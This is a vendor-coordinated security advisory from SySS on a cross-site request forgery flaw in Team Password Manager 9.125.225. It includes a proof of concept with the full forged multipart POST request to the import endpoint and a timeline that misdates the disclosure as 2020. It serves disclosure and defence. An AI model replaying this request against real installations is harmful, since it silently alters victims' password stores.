-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-059 Product: Team Password Manager Manufacturer: Ferran Barba Affected Version(s): 9.125.225 (released 2021-04-30) Tested Version(s): 9.125.225 (released 2021-04-30) Vulnerability Type: Cross-Site Request Forgery (CWE-352) Risk Level: Low Solution Status: Fixed Manufacturer Notification: 2021-10-28 Solution Date: 2021-11-12 Public Disclosure: 2021-11-30 CVE Reference: CVE-2021-44036 Author of Advisory: Stefan Walter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The manufacturer describes the product as follows (see [1]): "Team Password Manager is a self hosted (also called on-premises) web app that helps companies manage lots of passwords across lots of projects. It's specially designed for teams that need to manage several passwords in each project, that have lots of projects and that each project is shared among several people." Due to one single endpoint not enforcing its anti-CSRF token, the application is vulnerable to CSRF. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The anti-CSRF token for the endpoint /index.php/mysettings/import_upload is not checked. It can be left empty and the server will nonetheless process the request. This allows cross-site requests to import passwords into the area "My Passwords" of the affected user. The impact on security is negligible since passwords can only be imported into the personal area of users and not into shared projects. Attributes of existing passwords under "My Passwords" could not be overridden. Other endpoints which do not check the anti-CSRF token were not identified. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTML document can be deployed on the attacker's web server and triggers the victim's browser to import the passwords.

Proof of Concept: CSRF Password Import

If a user is logged in into the TeamPasswordManager, and if they visit this site in the same browser in another tab, then passwords are silently added to their "My Passwords" page.

The following request is sent to the web server during the attack: (inessential headers were removed in the listing) POST /index.php/mysettings/import_upload HTTP/1.1 Host: testinstallation [...] Cookie: PHPSESSID=ng3qmvt8ppqo7tg9f4jh04ipmm Content-Type: multipart/form-data; boundary=--boundary Content-Length: 809 Origin: null ----boundary Content-Disposition: form-data; name="csrft" ----boundary Content-Disposition: form-data; name="userfile"; filename="mypasswords.csv" Content-Type: text/csv "Test Password 0","","","user0@example.com","password","","" "Test Password 1","","","user1@example.com","password","","" "Test Password 2","","","user2@example.com","password","","" "Test Password 3","","","user3@example.com","password","","" "Test Password 4","","","user4@example.com","password","","" "Test Password 5","","","user5@example.com","password","","" "Test Password 6","","","user6@example.com","password","","" "Test Password 7","","","user7@example.com","password","","" "Test Password 8","","","user8@example.com","password","","" "Test Password 9","","","user9@example.com","password","","" ----boundary-- The web server answers exactly as it does for legitimate requests and the passwords are indeed imported (inessential headers were removed in the listing). HTTP/1.1 302 Found [...] Location: https://testinstallation/index.php/mysettings/import_result [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update Team Password Manager to the patched version. We thank the vendor for quickly responding to our e-mail and providing a solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-10-12: Vulnerability discovered 2021-10-28: Vulnerability reported to manufacturer 2021-11-12: Fixed in release 10.135.236 (see [2]) 2020-11-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Team Password Manager https://teampasswordmanager.com/faq/what-is-teampasswordmanager/ [2] Changelog of the fixed version https://teampasswordmanager.com/docs/changelog/#10.135.236 [3] SySS Security Advisory SYSS-2021-059 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-059.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Stefan Walter of SySS GmbH. E-Mail: stefan.walter@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEdN13zQMXJ3dHDTi+vguzEdo/PhYFAmGbbwgACgkQvguzEdo/ PhZ/3RAAnkLUEC8F9BXJYMit7beJHNvvbOIu6gMPMdDhH8vZbiaq5G09RAUOPEf+ qho47m+ZJQMN/Nhduk0tjd8R39sm3IJq86giWDkJFsxf2Raq8QuubuArt3WqlPzG 5fK+j20C/OgjVrymyZlyiTLxbWasnpONlfZcFcgudGDBrB+ieZs4kFQDipUJMJ+e /3G1VY2IbREl5i4fD/nwkq1PXbEFNtNkMiHRrGEmYv6603phQLoAmj3H1VN/zMmP Uc3f07rTI7VcR5PeW20JMp7BmdzJXh92c4MPwK3CpYjYxBaFT6/7ZGXMw1Qg33lf tto/Y8CRlF1PKzTSHlTVudkxSfqLLgh947RJ1u+GZG1e8Ttuqci8fL4WnzEssit4 ijSJ+n8AAMhlub9/ZhGw/6etHtSorkTmp3VFs5r/azFUThdHx+GzvftHNJ/Rw/77 F8ulMjpTHe6WKih5YqyflE/wrvfqN6zSn6dFMa1CkZ83ntzI0lIWfjKzuHqYTVJW 2bXYgZORsd3yxnTqfh64ts1zPz4hZ6cVDVZjPqcRrOTEz8LurqdLtxR84z5Rp4KG C17asbTJ4JyF6yH9L2BzoEi41kNE09pBzDnQerpPNcY/1zpeYRVXHKu/bTpWkVx1 Vl1YQIcyuv8hgfdpZCtMeWYok1p8ABCm5qFWavKBjoGu49s5gpA= =I4Gt -----END PGP SIGNATURE-----